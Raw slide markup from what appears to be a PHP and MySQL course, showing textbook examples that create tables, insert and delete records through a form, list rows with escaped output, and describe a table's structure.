              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, 'category');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $year = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, 'year');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $query = "INSERT INTO classics VALUES" .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    "('$author', '$title', '$category', '$year', '$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>')";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (!$result) echo "INSERT failed&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;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PK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CD930-3018-4900-AE33-12F7D6AE5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976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88886-8BD1-48A9-8949-C73C98AC6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 Commands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5088B-B5C2-4C68-B9AC-F40A2EC55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42791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SQL commands and keywords are case-insensitive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Create a new database called “publications”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	CREATE DATABASE publications;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Creating a table called classics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	CREATE TABLE classics (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	author VARCHAR(128),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	title VARCHAR(128),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	type VARCHAR(16),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	year CHAR(4));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E1C319-A28C-4F91-B345-044BE55CF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361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ABE45-EA33-4094-A113-C7B3388DC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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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88543-E809-40FB-A68C-A2CD3DEB5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1416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echo &lt;&lt;&lt;_END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sqltest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>" method="post"&gt;&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  Author &lt;input type="text" name="author"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  Title &lt;input type="text" name="title"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  Category &lt;input type="text" name="category"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  Year &lt;input type="text" name="year"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  ISBN &lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>           &lt;input type="submit" value="ADD RECORD"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  &lt;/pre&gt;&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>_END;</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK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03A8F-5901-4094-A608-F5DE11EE8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7875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E6162-CFFC-4F8C-A55B-77F0CD96A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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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8FA88-068D-4004-9427-0F4AF9B8F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197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$query = "SELECT * FROM classics";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>num_rows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for ($j = 0 ; $j &lt; $rows ; ++$j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $row = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $r0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $r1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $r2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $r3 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[3]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $r4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[4]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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224133-F719-4EEB-A85B-08696195C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7575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D2721-CD49-4B3A-B6FA-091842CB9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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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D937E-57E6-44C4-9D02-5D005B87F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34367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  echo &lt;&lt;&lt;_END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Author $r0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Title $r1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Category $r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Year $r3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ISBN $r4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;form action='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqltest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' method='post'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;input type='hidden' name='delete' value='yes'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;input type='hidden' name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' value='$r4'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;input type='submit' value='DELETE RECORD'&gt;&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_END;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0622FB-986F-4BF5-890E-3BBA14515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419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2B744-D0BA-451F-9CA4-1D63B548D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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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D3FFA-14D0-4F95-BC1E-86A166944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  $result-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $conn-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($conn, $var)</a:t>
            </a:r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PK" sz="2800" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>      return $conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($_POST[$var]);</a:t>
            </a:r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PK" sz="2800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" sz="2800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67DAAE-782F-49A8-9AF7-1E36D5BDC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598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92446-D17B-4204-8A25-24FF41E0A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Figure 10-2. The output from Example 10-6</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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C45B5F5-BED8-46C9-9F68-7B02B1CE60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2850" y="1309865"/>
            <a:ext cx="7226298" cy="541972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D8FF6E-C89F-4738-8F45-72D5CCDB8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6286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41586-F321-431D-9A7C-A797A1188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Table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901B7-524D-404D-A045-16BAD7100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556326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Example 10-7. Creating a table called cats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "CREATE TABLE cats (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    id SMALLINT NOT NULL AUTO_INCREMENT,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    family VARCHAR(32) NOT NULL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    name VARCHAR(32) NOT NULL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    age TINYINT NOT NULL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    PRIMARY KEY (id)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" dirty="0"/>
              <a:t>)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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6F811-4843-4DB3-86AE-AFD6883C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5699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8F54E-D23C-4394-A7FB-2D04C6190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a Table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36B4F-1B6D-45B4-ADDE-EBA998927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054674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DESCRIBE obtains information about table structure: Column, Type, Null, and Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Example 10-8. Describing the cats table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DESCRIBE cats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0C5BC-6BDE-4750-B8CE-A1DDE8912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764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8F54E-D23C-4394-A7FB-2D04C6190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a Table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36B4F-1B6D-45B4-ADDE-EBA998927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34910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  echo "&lt;table  style='border: 1px solid black'&gt;&lt;tr&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Column&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Type&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Null&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Key&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;/tr&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  for ($j = 0 ; $j &lt; $rows ; ++$j)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PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $row = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
